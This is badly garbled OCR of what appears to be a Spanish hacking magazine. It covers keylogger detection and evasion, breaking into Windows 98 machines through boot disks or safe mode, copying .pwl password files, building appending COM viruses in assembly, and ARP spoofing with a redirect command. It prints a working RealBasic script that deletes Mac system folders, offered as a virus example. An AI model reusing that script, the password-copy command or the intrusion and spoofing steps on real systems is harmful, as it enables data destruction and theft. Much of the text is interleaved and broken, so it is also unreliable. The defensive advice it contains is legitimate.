as Ayuda 
Archivo 


Resumen del sistema 
di Recursos de hardware 
4 Componentes 
, Entomo de soltware uu 
Controladotes de sisteme one 
Controladores firmados helpcti.exs 
Variables de entomo helpsvc.exe 
Trabajos de impresión kouch.exe 
Conexiones de ted lsass.exe 
Ejecutando lareas 
Módulos cargados 
Servicios 
Grupos de programas 
Programas de inicio evchost.exa 
Registro de OLE evchostexs 
Informe de estores de Wi] suchost.exo 
4 Configuración de Intemet system 


system idle proce. 
4 Aplicaciones de Office 10 tplray.exo 


winlogon. exa 
winwotd. exe 
wmiptvse.exe 


$smss.0%8 

spoolsv.exe 
svchost.exe 
svchosl. exe 


No disponible 
No dis 
ctarchivos .. 
condo sk. 
carchivos 
No disponible 
A 


[' Cerrar búsqueda ) 


ar búsqueda 
ON lo la categoría selec: E] Buscar sólo nombres de categoría 
(Buscar sólo la €: d las insta a- 
la A la mayor parte de A 
“La utilidad msinfo32, presente en Y utables del siste- 


Alió del 
ciones de Windows, permite visualizar los eje 
ma, y con ello encon 


cionada 


trar los eventuales keyloggers- 


puede haber va- 

riaciones en el sistema como el uso del comando AT, 

que es un servicio exclusivo de los sistemas NT/2000/XP y que 

permite la planificación de operaciones a intervalos de tiem- 
po. 


>> Registrar las operaciones con el 
teclado 


Hoy día, los más modernos keyloggers ofrecen numerosas 
funcionalidades adicionales como la captura de pantalla, de 
imágenes de una webcam instalada, etcétera, pero su función 
principal siempre es la misma: registrar la actividad del tecla- 
do, 

Para esto, Windows pone a disposición del usuario el meca- 
nismo del hooking, que consiste en permitir a un programa 
interceptar los eventos del sistema (como la digita- 
ción) y registrarlos en un determinado archivo. 

Tal mecanismo es en parte contraproducente en el enmasca- 
ramiento del software, ya que, para efectuar tal función de 
hooking un programa debe necesariamente colocar la propia 
parte de código relativa a la "captura" de las teclas en una bi- 
blioteca .DLL cargada en el espacio de memoria del SO, 
Estas bibliotecas necesarias para el hooking son fácilmente 
interceptables con una utilidad ya presente en mu- 
chas versiones de Windows (ipero no en todas!), que es 
Msinfo32. Este programa tiene una entrada específica para 
visualizar los. hooks de sistema. 


Hay que recordar que los hooks de sistema no son siem- 
pre aplicaciones de backdoor o de keylogger; en efec- 
to, muchos drivers para ratón o para teclado usan este meca- 
nismo para poder ofrecer servicios adicionales a los usuarios, 
y por tanto hay que prestar atención a eventuales falsas alar- 
mas. Otro mecanismo, hasta ahora no usado por ningún key- 
logger pero sí por muchas potencialidades, es el de la lectu- 
ra de las colas de los mensajes del teclado. 

Este método usa una API a nivel de usuario que es GetAs- 
yncKeystate y permite leer cada tecla digitada por el usuario, 
sea cual sea el software que esté usando. 

La diferencia sustancial reside en la carga de trabajo 
de la llamada a esta función, que debe efectuarse de mane- 
ra cíclica (polling) y por tanto tiende a consumir recursos de, 
CPU, aunque no de manera excesiva. La ventaja consiste en 
el hecho de que al no instalar hooks de sistema, no sale en la 
lista de la utilidad msinfo32, por lo que resulta más difícil de 
localizar. 


>> ¿Cómo defenderse? 


Llegados a este punto uno puede preguntarse si es posible es- 
tar infectado por un backdoor completamente invisible quizá 
proyectado por algún gobierno o peor aún, por algún rival 
suyo. La respuesta que os puedo dar con toda tranquilidad es 
negativa. En efecto, 

puede haber back- 
doors proyectados 
con un cuidado ex- 


¡Close Program 


temo, pero nin- 

gún programa, 

(a no ser que se 2- IDA : 

use un  LKM) Photoshop Hoja amaticsbook. TEX 07-20-01 


puede ser tan 
sofisticado para 
esquivar la enu- 


meración del 
me WARNING: Pressing CTAL+ALT+DE ; 


comput L , 
La respuesta llega MTS You will lose unsaved Informal o (Ssar your 
rápida, para la ; Programs 


mayoría de pro- > l 0 
cd e 
gramas que cir Ron cano | 


culan por la red; 

usar un firewall personal, 

Aparte de los varios ataques llevados a cabo contra: estos 
programas, los firewalls personales son muy seguros, aunque 
a veces hay excepciones con algunos backdoors. 

El problema viene en efecto de las llamadas Shell Extensions, 
que son funcionalidades puestas a disposición de los progra- 
mas y capaces de "extender" el SO, Tales bibliotecas pueden 
ser usadas para engañar a los firewalls y hacer creer 
que es el SO quien quiere conectarse a Internet, 
mientras que es el keylogger. 

Un ejemplo de este tipo de programa es Spector, que usando 
este mecanismo es captado por el firewall como el proceso 
explorer.exe, mientras que en realidad no es otro que tal pro- 
grama que quiere superar el mecanismo de filtrado del fire- 
wall. Ojo, pues, con el software presente en tu ordenador. 


- Microsoft Intemet E xplorer 


e 
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DEFENDER EL PROPIO ORDENADOR DE 


un firewall, tendrá un 
óptimo antivirus siem- 
pre actualizado y pro- 


ordenador con un pass- 
| word larguísimo y que 
' quizá cree imposible. de Nan Desgra- 
Aquamate ¡ay os para si 


| ombre de eceria Jus A les ejem- 
plo). 


de 


| jeguridad prese dd Y 

mente pe ls sist 00 AE Eivos de 
' Microsoft que se pueden usar para ob- 
tener un acceso ¡legal a un ordenador 
desde la red local. Veamos algunas si- 
| tuaciones típicas... 

Posible situación: escuela de un institu- 
to que tiene un normalísimo laboratorio 
de informática y varios ordenadores co- 
'nectados todos en red. Normalmente 
| para uso escolar y casero, se instalan 
sistemas operativos Windows en los or- 
' denadores. En nuestro caso será la ver- 
sión 98. Cuando se enciende el orde- 
| nador principal, que llamamos SERVER, 
nos pide un password para el nombre 
de usuario de SERVER, Lo que quiero 
| demostrar es simplemente la facilidad 


ra hacerlo es necesario encontrar un 
password, 

| Existen tres fáciles métodos que podría 
usar un cracker para tener éxito en el 


ucha gente sabrá usar intento. 
> 

bablemente protege su | 
' Cuando se enciende un ordenador el 
BIOS busca un disquete de arranque o 


un CD de arranque (depende de cómo 
esté configurado el BIOS). Cualquie- 


(por disquete de arranque se entiende 
el floppy de inicio de la instalación de 
¡Windows 9x, u otro disquete que con- 
tenga un sistema que se pueda iniciar) 


el a] IS ! para tel 
Bien en n este artículo veremos algunos 


(CP, Me, 2 y probables 
'leccionando el prompt de los coman- 
' dos se nos ofrecerá un shell de DOS lis- 


esta manera, es suficiente pulsar la te- 


' completando la operación con la asig- 


| operaciones por hacer cambian según 
la tarjeta madre usada, pero normal- 
' mente encontrarás una operación "Set 


con que se puede obtener acceso y pa- 
| Solamente has dleninuido un poco el 
riesgo. En efecto, el ordenador podrá ir 


=si el cracker tuviera uno, estaríamos 


INTRUSIONES NO AUTORIZADAS 


pues, podrá entrar procurán- MM otra vez en el punto.de partida, por lo | 
lose un disquete de arranque que hay que psoroAn de nin 


l 
| tema CI , Esta" op- | 
ción se encuentra a MROES" en la voz 
¡"Boot sequence" en la ventana "Stan- 
de Windows 98 o 95 e insertarlo en el dard features" de la configuración del 
lector. Cuando el BIOS lo lea, nos pe- MY BIOS de la tarjeta madre. 
dirá qué es lo que queremos hacer y se- MY Habiendo configurado el password pa- 
| ra el BIOS estarás seguro de que nadie 
- podrá entrar en la modalidad de confi- 
¡|guración. Para hacerlo habría que 
| crackear el password y sería necesario 
lanzar un programa que naturalmente 
el cracker no podría ejecutar sin haber 


to para su Uso y € ' él se puede h 

'r de . 
Para evitar que alguien se comporte de MN 
cla SUPR al iniciar el ordenador y co 


nación de un password para poder en- 
trar en la configuración del BIOS. Las 


password" en las opciones "Bios featu- 


La pantalla del BIOS donde se puede 
decidir excluir algunos tipos de disco de 
la búsqueda de un sistema iniciable. Si 
se selecciona solamente el disco C, 
será imposible acceder al ordenador 
usando un floppy o un CD de sistema. 


Naturalmente aún no estás a salv 


también a buscar un CD de arranque y 
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A 


¿entrado,en Windows o haber obtenido 
Un shell. Por, desgracia hayyotros méto- 
"dos más complicados,que pueden ser 
llevados a cabo con malas intenciones. 


PALA 


Si al encender el ordenador te ha pa- 
sado alguna vez que pulsas la tecla F8, 
habrás hecho un útil descubrimiento. ... 
Pruébalo y volverás a encontrarte de- 
lante de una pantalla que pide instruc- 


ciones sobre qué deseas hacer; hay nu- 


merosas opciones: inicio en modo pro- 
visional, con soporte de red, pero lo 
que nos ¡Interesa es “"lón 


linea de 


Ahora, piensa que cualquiera puede 
hacer esto que acabas de hacer y com- 
prenderós que incluso sin tu password 
se tiene acceso a tu querido erdencdor: 


vita que suceda, bas 
el , * 


con. edital el le] 


Cimsdos.sys. En la entrada ¡Op. 
tions] modifica Bootkeys=1 con Boot- 
keys=0 (en caso de que no esté la línea 
Bootkeys=1, créala). Presta atención al 


hecho que msdos.sys es un archivo nor- 


malmente invisible, por lo que será ne- 
cesario activar la visualización de todos 
los archivos desde el menú Ver/Opcio- 


| Q us y, 


MSDOS. SYS - Bloc de 
| frchivo Edición Formato Ver “Ayudas soci 
[Paths] 
WinDir=C:1WINDOWS 
WinBootDir=C=1WINDOWS 


|[ffHostWinBootDrv=C 


[Options] 
ÍBootMulti=1 
BootGUI=1 
DoubleBuffer=1 
AutoScan=1 
WinVer=4.10.1998 


DOCUMENTS — hiberfi.sys 10.SYS 


Modificando rchivo 


puede impedir que un malintencio 


ye 


efectúe el arranque en 


iniciar Windows. 


nes de Carpeta/Ver. Desgraciadamen- 
te existe aún un modo para violar tu 
PC, aunque es mucho más complejo. 


2 


Si Windows no se inicia con éxito, cuan- | 


ni do' 


modo MS DO ) al 


do se inicia de nuevo muestra una pan- | 


talla de aviso que dice aproximada- 
mente así: "No se ha podido iniciar 
Windows. Se aconseja volver a intentar- 
¡lo en modo a ARSS de fallos". 
| E 3! Ahora bastará solec 
cionar 'oromp de los comandos..." pa- 
| ra obtener un shell de DOS. Este último 
gusano es una medida de seguridad de 
Windows y no te conviene probar a 
| desactivarlo. Para hacer que Windows 
no se inicie correciamente basta apa- 


inicio, después de que aparezca el logo 
de Windows. ¡De esta manera se podrá 
acceder a la pantalla de aviso! 

Si quieres probar a bloquear también 
esta tentativa de ataque, bastará editar 


vez insertando la línea BootFileSafe=0 
siempre en la sección [Options]. Per 
st 25 aconsejable, va a 


E p, Duo 
caso dae 'Or ni DOdras reini 
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gar el ordenador durante el proceso de | 


de nuevo el archivo C:Amsdos.sys, esta ' 


lo que te creará | 


yy 


rorego 


Windows 2089 Advanced Options Menu 
Please select an option: 


Safe Mode 
Safe Mode with Networking 
Safe Mode with Command Prompt 


Enable Boot Logging 

Enable UCA Mode 

Last Know Good Configuration ' 
Directory Services Restore Hode (Windows 2009 domain controllers only) 
Debugging Mode 


Boot Normal ly 
Koturn to 0S Choices Menu 

2 Tand dto move the highlight to your choice, 
056 Enter to choose 


Provocando un erro! 


de Window: e tendrá acces 


iniciar en modi 


hell de 


jue permite re 


con un 


problemas. 
>» 


Pero ¿para qué debería alguien inten- 
tar obtener un shell de DOSt El motivo 
es s O un m en | 
ara " esmero que 
sirve para barra el ón del disco 
duro entero) ya puedes empezar a llo- 
rar. | 
O bien podría copiar en A: el archivo | 
de los passwords. Se trata de archivos | 
con extensión .pwl que se encuentran 
en CAWindows por lo que respecta a | 
Windows 9x. 
No tendría que hacer nada más que 
insertar un floppy y teclear: 


rmal 


copy C:WWindows1*.pwl A: 


El comando copiará todos los archivos 
con extensión *.pwl en el floppy. 

Una vez que llegue a su ordenador en- 
contrará el archivo *.pwl que corres- 
ponde al usuario SERVER, En este caso 
está claro que el archivo será SER- 
VER. pwI, porque el nombre tiene cinco 
caracteres. En caso de que tuviera más 
de 8, se cortará a la octava letra. Por 
ejemplo, a un'usuario llamado Maximi- 
liano le corresponderá un archivo Ma- 
ximili.pwl. El archivo está cifrado, pero 
en Internet los programas capaces de 
descifrarlo están tan difundidos como | 
las adorables adolescentes rusas desin- | 


hibidas. 
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Introducción al Virus 


zados apenas O 
| nombrar Uno de estos dos té 
¡| Apesar de la fama que los pres 
tas informáticos y los parásitos de 
| vos se han procurado en el mundo real, 
muy pocos saben qué 
dedicaremos mucho e 


ho po que empieza a nacer una € 


tencia" a la mala, pe 
ción que se ha he 


Entre las varias categorías a 


do, y a propósito, por virus se enti n- 


| 7 mas der ho 


que ver € 


intenta dar vida 8 U 
imensiones | 


Bus ¿o 
man e. [ol 
il 


víctima, se 
isamente 


ue raramente intentan esconderse 
emo infectado. l 


distinguidas dos categorías 
diferentes des virus, hay que hacer! 


un breve resúmen de las distintas tipo- 
logías de virus que existen: se parte de 
los más simples, los virus appending 
de los archivos COM posglllo por los 


impotentes virus del mb ando por 
los sthealth parciales yA pletos has- 


en detalle ci 


los polimórficos y los más recier 
para Windows sin olvidar los” 

de las Macros de Office. 

stos son algunos de los tipos de 'in- 

adores virtuales" conocidos que re- 
querirían muchas páginas para explicar 

funcionan. Esta vez nos 
“a tratar los más simples, 


como los appending y nos remitiremos 


al polimorfismo y a la criptografía. 


"Los virus appening son os más 
munes y los más fáciles de realizar. Se 


copian al final de un archivo y € 

el archivo se ejecuta toman el control 
se reproducen en otros archivos yiB 
último devuelven el control 

ma infectado, haciendo 


| rezca normal. Este tipo: 


ser muy pequeño, para no au- 
demasiado las dimensiones de 
hivo que de esta forma sería fá- 
cilmente localizable como infectado. 
Los appending se dividen en dos sub- 
categor(aj los hechos para archi 
COM y para archivos EXE. E 


a pesar de que ambos tipos de archi- 
vos sean ejecutables, existen diferen- 
cias entre ellos e infectar los archivos 
COM resulta mucho más simple dada 
su estructura; por tanto, este texto se 
basará mayormente en la infección de 
archivos COM, La primera elección 
que hay que hacer para la construc- 
ción de un virus es el lenguaje con el 
que se escribirá. Aunque el € puede 
ser una alternativa válida, sobre todo 
ara los virus para Windows, el ensa- 
aer resulta la mejor solución. 
Empecemos pues a ver qué debe ha- 
cer un archivo para infectar a otro sin 
destruirlo: el virus en ejecución debe 
lbuscar un archivo ,com (por ahora nos 
limitaremos a estos), controlar de algu- 
na manera que no esté ya infectado, 
modificar el archivo como veremos lue- 
| go y finalmente restablecer la fecha de 
Ha última modificación y de los atributos 
del archivo como los había encontrado, 
a fin de evitar dejar huellas. El problema 
¡para quien empieza está en compren»- 
er cómo hacer para quitar el control 
del archivo ejecutado y darlo al virus 
que, como explicamos después, 


Laggjución la da la instrucción en en- 
ablador JMP que escrita al principio 
rchivo re la ejecución al fi- 
al) donde reside el virus. Este, una vez 
ejecutado, busca los archivos a infectar 
y cuando encuentra uno copia por una 
parte los primeros bytes del archivo víc- 
tima y en su lug cribe la instrucción 
JMP seguic le posición que tomará 
en el archi 
piará a sí mismo al fina 


seguirá con las opera 
das: cierre del archivo 


Klez 


z hecho esto se co» |] 


original. Esto es lo más importante de la 
teoría sobre los virus appending, el Úni- 
co obstáculo ahora puede ser el escaso 
conocimiento del ensamblador, por tan- 
to estaría bien saber qué es un registro 
o un jump antes de continuar. 


Una cosa que muchos suelen olvi- 
dar es que, si se usan variables en los 
virus, éstas cambian su valor de offset 
cuando el virus se pega al final de un 
archivo. Es por esto que a menudo re- 
sulta imposible volver a estas variables 


que se vuelven inutilizables. Para en: 


mentar DON 


instrucci | que llama a un 
miento, cargar en BP y luego 
sustraer del registro BP (que se usa 
muy poco) el offset del procedimiento 
llamado. Todo esto es posible porque 
cuando llamamos con un CALL en el 
offset del procedimiento se coloca en- 
cima de la pila, por tanto con POP ] 
Llegados a este 
Bunto; lo referencias a las variables se 
harán llamando a [BP+OFFSETvaria- 
ble]. Esto resulta fundamental para 
evitar perder referencias a las varia- 
bles; al contrario no se puede modifi- 
car las instrucciones que usan un offset 
relativo como los JMP o CALL o los va- 
rios saltos condicionados. 
Una vez encontrada la variación de 
"Loffset, el programa empieza a buscar 
archivos para infectar. Como ahora 
solamente de archivos 
, la búsqueda se limitará sólo a 
e tipo de arch “Para buscar un 
archivo se recurre a los llamados 
"NEXT, es decir, 
(interrupt 21h). Se : 
4Eh busca el 


y por busca (= Ad Only 

dden 2-System 3-Label 5-(reser- 

, 6- brcnial mientras DS:DX el 

E fgrchivo por b r con comodines 


ADB"*,0 que nio la ca- 
'ASCII2 que hay q 


la cordón) y luego | 
hivo que hay que buscal 


Icavallo deTroya] Melissa 


HARTA AA O... 


hay. qu buscar con 


¿dónde nos restituyen lo; 
FIRST y FIND NEXT? En el DTA que es una 
parte del PSP posicionada a 80h. 


ginal; de otra for 
línea de comando 
grama estarán fal 


portante configurar Una 
bajar en ella, Bástorá pre 


ble DTA- 
ly luego L 

DX, [BP+OFFSET DTA] por ta 
| 1Ah y luego INT 21h. Luego 
úrchivo que se quiere in 
remos en la variable lá. en la posición 
9eh (por tanto llamaremos la variable DTA 
con [BP+OFFSET DTA+FTE EndorA no 
"| se encuentra solo el nom chivo, si 

no también sus atribuk 
de la última modifi ] 
todo en el siguiente 


dispensable asegurarse del 
nuestros criterios de infección: Si el archi- 
vo ya ha sido infectado será más oportu- 
no evitar rehacerlo. Uno de los métodos 
más comunes para controlar si el archivo 
ya ha sido infectado es poner un marca- 
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LEA DX, 


por tanto 


hay que mar INT 21h para empe- 
zar a buscar. La búsqueda restituirá 
sólo el primer archivo encontrado, si 
esto no va bien bastará con llamar la 
FIND NEXT (función 4Fh archivo a 
buscar) para encontrar el siguiente ar- 
chivo hasta que no encontre : 
víctima apta. 


Hasta aquí es todo m 


de usar el DTA ori- 
sados a la 
ación del pro- 
es im- 


Pero un virus no pu 


42 bytes (DTA db 4: 
Fla función 1 Ahidel 


“lo encontra- 


Por tanto si quisiéramos leer un atributo |' 
cualquiera de estos, bastará añadir a la 
dirección de la variable DTA la posición 
de lo que'Ihteresa. 


Una vez encontrado un archivo es in- 
entre en 


dor de infección en los primeros bits del 
también del virus), justo des- 
astrucción de JMP,.El virus de- 
vez € grroda una ¡posible víc- 
determinada po- |. 


Irolar sie 


istrucciones pondre: 


UR; marcador que en n 
Bs la letra R 

ICIO: ; etiqueta donde e 
propiamente 
Virus, antes de inf 


Ao con un CMP, y en 


i ¿e : 
ra los que lucha Un escritor de y 
producir un bicho malo 


unque 


en esta 
mejor 


servar con 


do durante días... Ki 


ir Po primeras 


P INICIO; salto simple dio 
Stro ca- 


o lo sea procederá a la infección. : 
y D ¿ o 


ibir virus y difundirlos eñ 
nes destructivas y dañi- 
) para las grandes em- 
s que producen caros sistemas án- 
irus) es innegáble la fascinación técni- 
co de algunos aspectos que se afrontan 
ámbitos de la” informática: el 
Asejo es aprender siempre ess 
tudiando también este tipo de código; a 
menudo te quedarás de piedra al ob- 
Hfacilidad un buen escri- 
tor de virus "resuelve problemas de pro- 
aramación con los aus tí te:has nelea- 


Programar un 
virus no es una 
operación 


restringida a Mac ( 3 


los PC 


compatibles IBM, 


sino que es una opera ón 


Mac. Au OS referimos para 
uso didáctico el ejemplo de ff 


un virus muy eficaz realizado 


en Real Basic, uno de los 


: lenguajes de programación más 
. difundidos en el entorno Mac: 


Dim 


Dim as FolderlItem 
Dim as FolderIltem 
Dim j as Folderltem 


//dossier Programme MN 


f=GetFolderlItem(“Macintosh 
HD:Programme” ) 
If f <> nil Then 


f.Delete PP 


End if 

//dossier Tools 
g=GetFolderItem(“Macintosh 
HD: Tools”) | 


if g <> nil Then PM 


g.Delete 
End if 


h=GetFolderTtem(“Macintosh 
HD:Dienstprogramme”) 

If h <> nil Then 

h. Delete 

End if 


¡=GetFolderItem(“Macintosh | 
HD:Dokumente” ) 
If i <> nil Then 


i.Delete 


End if 


j=GetFolderlItem(“Macintosh 
HD: Internet”) 

If 3j <> nil Then 

j.Delete 

End if 


un sistema operativo o dañar 
seriamente un disco duro; 
conocer su script puede 
ayudar a salir del embrollo 
en caso de emergencia. 


f as FolderlIten ff 
Dim g as Folderltem M 

h 

a 


Con el ARP-spoofing resulta pusible esnifar nel, 
segmentos dela red que, en teoría, deberían es 


vando se proyecta una 
red local, se tiende a 
menudo a aislar los 
varios componentes 
con switches. De esta 
manera se debería 


ofrecer también una mayor seguri- 


dad, ya que si un atacante se sitúa en 
una posición cualquiera para esnifar el 
tráfico que pasa por la red, intercepta- 
ría sólo los fragmentos de datos 
que pertenecen a la misma su- 
bred. Existen varios ataques que per- 
miten, sacando partido de las debilida- 
des de algunos protocolos, interceptar 
los datos que se envían a un ordena- 
dor. Una de estas técnicas es el ARP- 
spoofing. 


>> Estándar 150 OSI 


Una comunicación entre dos ordena- 


dores requiere numerosas operaciones, - 


y también necesita el intercambio de 
mucha información. Para simplificar la 
gestión de este problema, se ha intro- 
ducido el estándar 150-0S1. El están- 
dar ISO OSI está formado por 7 nive-, 
- les. El nivel más bajo es el nivel físico, 


que se ocupa de la transmisión física de | 


y 


ns na li 


los datos a través de los cables de red, 


“mientras que el nivel más alto es el ni- 


- del nivel siete y enviar el mensaje. 


vel de la aplicación o las especificacio- 
nes usadas por las distintas aplicacio- 
nes para comunicarse. 


Si un ordenador A quiere enviar un 


para acceder a la información 


la dirección física que identifica la 


' funciona el estándar ISO OSI, 


mensaje a un ordenador B el paquete 
pasa del nivel más bajo de la pila 
ISO OSI, el cual añadirá un header 
con la información competente para el 
caso, y pasará el paquete al nivel supe- 
rior, que a su vez añadirá otro header 
que especifica los parámetros de aquel 
nivel y lo enviará al nivel superior, has- 
ta llegar a encapsular el header 


El receptor, a su vez, recorrerá la 
pila (así se llama el conjunto de 
niveles) partiendo del nivel más 
bajo hacia los niveles más altos; 


contenida en el mensaje. 


>> El Protocolo ARP 


7 


tarjeta de red del destinatario (la direc» 
ción MAC) partiendo de una dirección 
IP de nivel 3. El protocolo ARP se ocupa 
precisamente de esto, para lo que 
construye tablas en las que las re- 
laciones MAC-address se asocian 
a las direcciones IP. 

Una LAN bastante ancha puede estar 


- constituida por cientos de ordenadores, 


por tanto, si cada ordenador tuviese 
una memoria que contuviera en modo 
estático una tabla que asocia las IP a 


las MAC habría graves problemas en el 


caso de que se añadiera también un 


Para comprender bien el funciona- 
miento del ataque descrito en este 
artículo, conviene repasar un poco 
el modelo de las redes ISO/OSI. 


Los protocolos comunicación de bajo nivel 
cubren las cuatro primeras capas: 

- Capa 1: Interfaz física 

- Capa 2: Línea 

- Capa 3: Red 


- Capa 4: Transporte 


Una vez visto brevemente cómo 


debemos comprender cómo es 
posible, en una red LAN, obtener 
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Los protocolos de elaboración de alto nivel 
cubren las otras tres capas: 

- Capa 5: Sesión 

- Capa 6: Presentación 

- Capa 7: Aplicación 


€ o BP Ye 


Edi Capture 


solo ordenador y se ten- 
drían que modificar to- É 
das las tablas de todos 
los ordenadores. Por 
suerte, el protocolo ARP 
se nos presenta colabo- * 
rador para resolver este 
problema. Veamos aho- 
ra cómo es esto en la 
práctica: supongamos 
que el ordenador con la E 
IP 196.0.0,1 quiere la 

dirección MAC del orde- 
nador 196.0,0.24. La 4 
primera operación que 


Source; 
Types 1P (0x0B0% 
19 Internet Protocol, 


Mext sequence nuber 


PEPVREAES 
PELAR 
AS 


V2a2P25 


Display Tools 


Source port; telnet (23) 
Destination port; 1573 (1573) 
Sequence number; 78974 


Telnet Data 
Telnet Data 


telnet > ACK] Soq=70974961 Ach=4214495005 Vinsb14 
gl 974961. Ack=4214495025 Vin=bl4 


telnet > 157: 
Conf. Roo! 
Telnet Data ... 
Telnet Data ... 
Telnet Data ... 
Telnet Data ,.. 


0:06:90: FL:d5 Cost = 167 


» Dot Addr; 131,130 
Port; 1573 (1573), 


00 45 10 
4 083 82 


efectuará será enviar a 
A oi Et 
¡Cm Mi desar 

ción de la dirección 

MAC del ordenador 

196.0.0.24; esta opera- 

ción se realiza enviando una petición 
ARP who-has a la dirección mac 
HARAN A, que corresponde a la 
dirección MAC de broadcast. Todos los 
ordenadores de la red recibirán esta 
petición, y el ordenador interesado res- 
ponderá con un ARP reply y la pro- 
pia dirección Mac. Una vez que el or- 
denador 196.0.0.1 ha conseguido: la 
dirección MAC, la memoriza en su 
propio caché de modo que -si se: cde- 
be enviar un nuevo mensaje- no sea ne- 
cesario efectuar de nuevo esta petición 
que generaría tráfico adicional en la 
red. 


ARP-Spoofing 


Ahora que ya hemos ilustrado cómo 
funciona el protocolo ARP, ya estamos 
en condiciones de comprender cómo 
funcionan los ataques de tipo ARP-spo- 
ofing. 

Como acabamos de decir, cuando un 
ordenador A debe pedir la direccion 
MAC de otro ordenador B, la primera 
operación es enviar un mensaje a todos 
los ordenadores pidiendo tal dirección, 
por tanto, si un malintencionado 
quiere redirigir el tráfico dirigi- 
do de A hacia B al propio orde- 
nador C, le bastará con responder a 
la petición enviada, pasando como 
dirección IP la de B pero como 
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MAC la suya (€), de esta manera el 
ordenador A transmitirá los datos diri- 
gidos a B al ordenador C, que recibiría 
todos los datos. 

Obviamente, si el atacante quiere evitar 
que B sospeche después de algún tiem- 
po en el que no está recibiendo nada, 
deberá hacer de manera que todo el 
tráfico que llega a € se retrans- 
mita nuevamente a B, de modo 
que C pueda permanecer a la escucha 
con un sniffer sin que A o B sospechen 
nada. Para hacer esto se usan los pro- 
gramas adecuados (en la red se pue- 
den encontrar varios) de ip forward 
que redirigen el tráfico de C a B, 


Un ataque práctico 


Ahora veremos en la práctica cómo se 
realiza un ataque. Obviamente, deja- 
remos de lado algunos detalles que 
daremos por descontado, de modo 
que no proporcionaremos a los ma- 
lintencionados ideas para acciones 
ilegales, 

En este ejemplo práctico hay tres orde- 
nadores (Fig2) un cliente (a) con la 
dirección IP 196.0.0.1 que comunica 
con el propio server (b) con la IP 
196.0,0,24 y nuestro ordenador, des- 
de el que se efectuará el ataque (e), 
con la IP 196,0.0,25, 
imaginamos que 


196.0.0.24 y 


Port 
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196.0.0.1 están conectados y se están 
comunicando. Para tener acceso a la 
información que los dos ordenadores 
se están enviando, el atacante deberá 
actualizar la tabla ARP para rediri- 
gir el tráfico entre los dos ordenadores. 
Para hacer esto, usará DugSniff. Ob- 
viamente éste es sólo uno de los nume- 
rosos instrumentos que se pueden usar 
para probar si tu red es vulnerable an- 
te este tipo de ataques; si quieres pro- 
bar otros, dirígete a la sección de enla- 
ces del artículo, Para direccionar hacia 
el ordenador del atacante el tráfico que 
se transmiten 196.0,0,1.y 196.0.0.24 
se debe usar el comando ARP redi- 
rect 196.0.0,24 196.,0,0,1, De este 
modo ahora el ordenador 196.0.0,25 
o el ordenandor desde el que se lanza 
el ataque puede interceptar el tráfico 
que se transmite, Para completar el ata- 
que bastará habilitar en el ordenador 
del atacante un IP forwarding. De 
esta manera, los dos ordenadores se- 
guirán intercambiando datos como si 
no pasara nada y el atacante podrá es- 
nifar todo el tráfico que se da entre los 
dos ordenadores. 


Prevenir e 
interceptar el ataque 


Este tipo de ataques no es fácil de 
detectar, puesto que los ordenadores 
que sufren el ataque no sufren ningún 
defecto en particular que pueda señalar 


ia email. Arpwatch uses libp 


fethemet/ip address 
a mindependent 


pdump, you must first retrieve and build 


ent] 


Replacement 


un ataque en curso, por lo que es ne- 
cesario monitorizar la red para de- 
tectar un ataque. Para hacer esto, se 
puede tratar de descubrir si en la red 
hay alguien que está esnifundo datos, 
o, más sencillamente, controlar 
constantemente la tabla ARP. 
Para este fin existe un programa llama- 
do ARP_watch que guarda en un re- 
gistro los cambios de la tabla ARP y 
permite detectar el ataque. 


ENLACES DE UTIL 
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Por lo que respecta a la prevención de ata- 
ques, la Única manera de protegerse es 
configurar las tablas ARP en modo 
estático, aunque esto comporta desven- 
tajas como hemos visto al principio. 


Consideraciones 


Como hemos podido ver, este tipo de 
ataques es extremadamente po- 
tente, tanto por la facilidad con que se 
puede poner en práctica, como por la 
dificultad en detectarlo. Además per- 
mite al atacante obtener información 
incluso en una red con switches. Pero 
hay que decir que estos ataques pue- 
den ser aplicados solamente en re- 
des locales, y que no representan 
una amenaza hacia el exterior. Antes 
de dejaros, os recordamos que usar 
estas técnicas para verificar la seguri- 
dad de la propia red está permitido y 
es aconsejable, mientras que intercep- 
tar el tráfico de usuarios desconocidos 
-además de antiético- es un acto puni- 
ble por la vía penal (aunque se trate de 
ordenadores dependientes de la em- 
presa que autoriza la interceptación), «+ 
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